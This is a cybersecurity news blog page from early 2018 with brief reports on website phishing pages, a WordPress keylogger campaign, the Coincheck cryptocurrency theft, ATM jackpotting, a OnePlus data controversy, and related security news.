Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Hackers using Phishing pages to strike down websites

Phishing pages, of late, have become an easy resort for the cyber hackers to strike millions of websites across the globe. The experts engage in dealing with these hackers in Netcraft confirmed it after encountering hundreds of such pages hosted in a folder/.well-known/.as they logged on to the websites since it serves as a Uniform Resource Identifier (URI) path for the users to get into the details of the policies.

Normally, the users keep browsing through the directory to own up a domain since they get to know the required information to host the domain.


According to the experts, the attacks of the kind with /.well-known/ in the directory is made available on the sites which support HTTPS only.

A phishing page is kept hidden in /.well-known/ since the folder is easily available in many websites without the active support in the administrator's system.


A dot in the directory’s name was believed to have provided the experts huge clue to the nefarious network. Since all the folders and files have start mark as “.” lS command is not visible. These hackers have no dearth of designs to strike as they have deployed subdirectories /pki/ validation/./acme-challenge to ensure that the phishing pages are not easily found out.

Those dealing with these cyber hackers find it quite tough to discover the way the nefarious hackers could hijack the websites with these phishing pages.

Most of them have concluded that only the shared hosting platforms are vulnerable to be misused since the file permissions on the directories are permissive which permits a portal to upload content on somebody else’s website.
Read more »
hybrid architecture
Cyber Security cyber threat hybrid architecture

The Team8 Portfolio Company, comes Out of Stealth and launches its First Product upon a Disruptive Hybrid Architecture

The Israeli cyber security company Hysolate founded by President Tal Zamir, a veteran of an elite Israeli cyber unit and the former Research and development leader in Wanova, Dan Dinnar, former CEO of HexaTier and executive sales officer at CyberArk Programming, has recently made the news for raising around $8 million, led by the cuber security foundry Team8 and Eric Schmidt's Innovation Endeavors.

In light of the rising number of cyber threats the Team8 portfolio organization, has at last left stealth and instituted its first product.

There have been occasions that have in some way or the other found a way to keep the enterprises indentured to regularly attempt to lock down user devices, keeping the users from fully browsing the web, installing in new applications, interfacing USB devices or communicating adequately with the 3rd parties or the cloud.

In different cases, enterprises are made to embrace an "air gap" security display or model that requires the clients to really carry two laptops: one unhindered laptop for full internet use and another entirely restricted laptop for favoured corporate access. While this significantly enhances security, efficiency or in yet other words productivity is additionally corrupted. This however never fails to further frustrate the employees and fundamentally brings about the abatement of efficiency.

Hysolate, while keeping up the most elevated level of security, enables enterprises to run various next to each other working system on a solitary workstation, giving a consistent experience to the end-users. The start-up is known for building its stage upon an option "hybrid" design that disposes of these difficulties.

Zamir said, "While we are proud to introduce Hysolate, what excites us even more is that we are creating game-changing comprehensive security architecture for endpoints. The feedback we have received from our first customers - who include some of the worlds most respected and well-known brands - over the last year has been overwhelmingly positive, and we look forward to rapidly expanding our customer and partner base over the next year."

Indeed, even Nadav Zafrir, Co-Founder and CEO of Team8 concurs that while most enterprise security products concentrate on security first and users last, Hysolate is "secure-by-design", guaranteeing no compromise on both security and user experience. What's more, he additionally adds that since its beginning, the Hysolate group has far surpassed their expectations.

Hysolate, as of now is even working with some of the biggest enterprises in the world, including a few of the world's biggest banks, innovation and technology merchants, money related service providers and other enterprise organizations and remains the fourth company to be launched out of Team8, joining Illusive Networks, Claroty and the recently launched Sygnia.


Read more »

Keylogger campaign infects 2,000 WordPress sites

Security researchers have discovered over 2,000 WordPress sites —possibly more— infected with a keylogger that's being loaded on the WordPress backend login page and a crypto jacking script (in-browser cryptocurrency miner) on their frontends.

Researchers at Sucuri who made the discovery said the recent campaign is tied to threat actors behind a December 2017 campaign. Both incidents used a keylogger/cryptocurrency malware called cloudflare[.]solutions. The name is derived from the domain used to serve up the malicious scripts in the first campaign, cloudflare[.]solutions.

Cloudflare[.]solutions is in no way related to network management and security firm Cloudflare.
The attack is quite simple. Miscreants find unsecured WordPress sites —usually running older WordPress versions or older themes and plugins— and use exploits for those sites to inject malicious code into the CMS' source code.

Attackers use injection scrips on WordPress sites with weak or outdated security. “The cdjs[.]online script is injected into either a WordPress database (wp_posts table) or into the theme’s functions.php file,” Sinegubko wrote.

HTLM is obfuscated to include JavaScript code, such as “googleanalytics.js”, that load the malicious scripts “startGoogleAnalytics” from the attackers’ domains.

The malicious code includes two parts. For the admin login page, the code loads a keylogger hosted on a third-party domain. For the site's frontend, crooks load the Coinhive in-browser miner and mine Monero using the CPUs of people visiting the site.

“While these new attacks do not yet appear to be as massive as the original cloudflare[.]solutions campaign, the reinfection rate shows that there are still many sites that have failed to properly protect themselves after the original infection,” wrote Denis Sinegubko, a senior malware researcher at Sucuri who authored research blog this week.

For the late-2017 campaign, crooks loaded their keylogger from the "cloudflare.solutions" domain. Those attacks affected nearly 5,500 WordPress sites but were stopped on December 8 when the registrar took down the miscreants' domain.
Read more »
NEM
Bitcoin bitcoin exchange cryptocurrency Cyber Crime Japan Cyber attack NEM

Japan cryptocurrency exchange to refund stolen assets worth $400m

Coincheck, one of Japan’s major cryptocurrency exchange, has promised to refund to its customers about $423m (£282m) stolen by hackers two days ago in one of the biggest thefts of digital funds.

The hack occurred on Friday, when the company detected an “unauthorised access” of the exchange and suspended trading for all cryptocurrencies apart from bitcoin.

The attackers were able to access the company’s NEM coins, which are a lesser known but still the world’s 10th biggest cryptocurrency by market capitalisation. The losses went up to about $534m (£380m).

The company has stated that it will reimburse the affected customers to nearly 90% of their loss using cash.

Over 260,000 are reported to have been affected by the hack.

According to Coincheck, the hackers were able to steal the NEM coins because they were kept in online “hot wallets” instead of the more secure and offline “cold wallets.”

The company claims that it is aware of the digital address where the coins have been transferred and believes the assets are recoverable.
Read more »

Hackers forced US ATM machines to spit out cash

Two of the world's largest ATM manufacturers in the US, Diebold Nixdorf Inc and NCR Corp have warned their clients  that hackers are targeting their machines with tools that force them to spit out money via hacking schemes “jackpotting.”

Both the makers have not identified any victims or how much money they had lost till now.

The attack was reported for the first time on 27 January by the security news website Krebs on Security. Immediately, companies sent out alerts to clients warning of the trend on Saturday.

'This should be treated by all ATM deployers as a call to action to take appropriate steps to protect their ATMs against these forms of attack,' the company said.

Jackpotting has been widely used around the world in recent years, but still, it is unclear how much cash has been stolen because victims and police do not disclose details.

Diebold Nixdorf has admitted that US authorities had warned them about one of its ATM models Opteva, which they stopped manufacturing several years ago,  being targetted by the hackers, but they did not take the warning seriously.

 Krebs on Security reported, "a confidential US Secret Service alert sent to banks said the hackers targeted stand-alone ATMs typically located in pharmacies and big-box retailers as well as drive-thru ATMs."

However, Federal Bureau of Investigation has started investigating the matter.

Read more »
OnePlus
China Data Theft OnePlus

OnePlus denies accusation of sending Clipboard data to China

OnePlus had been accused of sending Clipboard data taken from OnePlus phones in the latest OxygenOS Beta version to China and has now denied the accusations, saying that the file is inactive and created for Chinese phones only.

The information was first revealed by Elliot Alderson on Twitter, where he explained how the application works.

He posted that a strange file called badword.txt existed in the clipboard application, along with 6 others, for the OxygenOS Beta update which could identify what kind of data the user copied to their clipboard and send sensitive data such as bank information and passwords to a Chinese server, allegedly pointing to a Chinese company called Teddy Mobile.

OnePlus has since denied this accusation and released a statement saying that "there’s been a false claim that the Clipboard app has been sending user data to a server. The code is entirely inactive in the open beta for OxygenOS, our global operating system. No user data is being sent to any server without consent in OxygenOS."

They added that the identified folder exists in the open beta for HydrogenOS, their operating system for China exclusively, in order to filter out what data to not upload and that local data in this folder is skipped over and not sent to any server.
Read more »

Japan cryptocurrency exchange lost $532 million to hackers

A Tokyo-based cryptocurrency exchange Coincheck has confessed that hackers had stolen several hundred million dollars worth of its holdings.

The company said that about ¥58 billion ($532 million) worth of its NEM coins was transferred to another account around 3 a.m. local time on January 27, 2018. This news has created a panic mode among the clients about their virtual assets.

Co-founder of the company Yusuke Otsuka said that they didn’t know how the 500 million tokens went missing, but the firm is investigating and trying hard to ensure the safety of all client assets.

“We know where the funds were sent,” Otsuka said during a press conference at the Tokyo Stock Exchange. “We are tracing them and if we’re able to continue tracking, it may be possible to recover them. But it is something we are investigating at the moment."

The firm had seen a significant downfall in the balance of its NEM virtual currency after the illegit transfer of funds incident.

“We are deeply sorry for troubling people with this issue,” Coincheck CEO Koichiro Wada. 
Read more »
WADA
Hacker group Olympics Russian Hacker WADA

Russia-linked hackers Fancy Bears leak data from International Luge Federation

A Russia-linked hacker group called “Fancy Bears” released a statement on Wednesday claiming to have leaked emails and documents that demonstrate violations of anti-doping rules, just two weeks before Winter Olympics 2018.

“The obtained documents of the International Luge Federation (FIL) show the violations of the principles of fair play: widespread TUE approvals, missed anti-doping tests and the double standards approach towards guilty athletes,” read the report.

This is the same group that was implicated in the 2016 Democratic National Committee (DNC) hack, and is also known by the names “Pawn Storm” or “APT 28”.

This is believed to be in response to Russia’s ban from the 2018 Winter Olympics following the controversy in the 2016 games where the same group is believed to have been responsible for the hack that leaked sensitive athlete data stolen from the World Anti-Doping Agency (WADA), which too was in response to the organization’s recommendation to ban Russian athletes from the 2016 games in Rio over allegations of state-sponsored doping.

The hacking group’s “About Us” on their website reads, “We are going to tell you how Olympic medals are won. We hacked World Anti-Doping Agency databases and we were shocked with what we saw.”
Read more »

Google Chrome 64 update fixes 53 bugs

Google has released 64 updates for its Chrome browser and this stable build is available for Windows, Mac and Linux users.

The new Chrome update is going to provide users a  better experience with video and fixes a number of Meltdown and Spectre vulnerabilities.

One of the most important features of the update is its ability to mute entire websites, while current browser lets you to mute individual tabs only. This implies that users can now mute the websites for forever with autoplay videos.

The blog post says, “We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.”

The update includes 53 security fixes. It will provide High Dynamic Range (HDR) support for any PC running the latest version of Windows 10 and an HDR-compatible monitor.

The Google has rolled out the update for users on the platforms and users will be able to download it soon.

Read more »

Official app stores targeted by malicious Bitcoin apps to steal money and personal data

Hackers are targeting app store users of  Apple, Google Play, SameAPK, APKPlz and other with malicious cryptocurrency apps to steal money and personal data.

The cybersecurity company based in San Fransisco analyzed 18,408 apps across App stores to detect ones that are blacklisted by cybersecurity vendors. They uncovered over 600 blacklisted Bitcoin-themed apps in total.

Their research team found out 661 blacklisted apps were available for users to download across 20 app stores including Apple's App Store, Google Play, and others.

With 272 apps, Google Play has hosted the highest amount of malicious cryptocurrency apps.

"We are seeing threat actors around the world exploiting what is already a hostile currency in a lawless digital world," Fabian Libeau, EMEA vice-president of RiskIQ.

"Before handing over any cash or personal data, investors should carry out thorough research into the exchange and wallet apps they intend to use. By checking the developer's name, user reviews and the number of app downloads, investors can measure the validity of an app and be more confident in their choice."

According to the report, hackers have used apps including phrases like "bitcoin exchange," "bitcoin wallet" and "cryptocurrency" to lure potential victims.

Read more »

Power grids facing cyber security threat


The cyber security experts claimed to have discovered yet another fatal virus in the power grid system forcing the authority to suggest an effective mechanism to deal with the impending security threat in the entire sector.

Named as Wannacry ransomware, the deadly virus is now a new resort for the hackers to target the existing information network of a few power distributors in Ukraine disrupting the entire distribution system in the country. The power distribution functioning in the country’s capital city plunged into a crisis even after a mild attack two years back.

A gang of hackers struck again with the same deadly virus in May last year partially paralyzing many personal computers along with networking systems in more than 100 countries. These include India forcing a worried power ministry to set up a panel of experts in Central Electricity Authority to devise a mechanism to counter the crisis.

The CEA panel submitted its findings in July last year confirming more such attack in the store since the power network deployed to distribute electricity to consumers is, beyond doubt, vulnerable to the hackers.

The expert's talk of a computer worm which permanently disables the smart meters since it keeps moving in the advanced metering infrastructures.

The findings have mentioned the lack of a technical standard to ensure cyber safety and security suggesting the absence of security in the smart grid systems. The report suggested the authority to install an advanced mechanism to share the information on the cyber security incidents.

The CEA experts further agreed that the cyber threats are not predictable which cant be anticipated, unlike other problems and troubles.
Read more »
Subscribe to: Comments (Atom)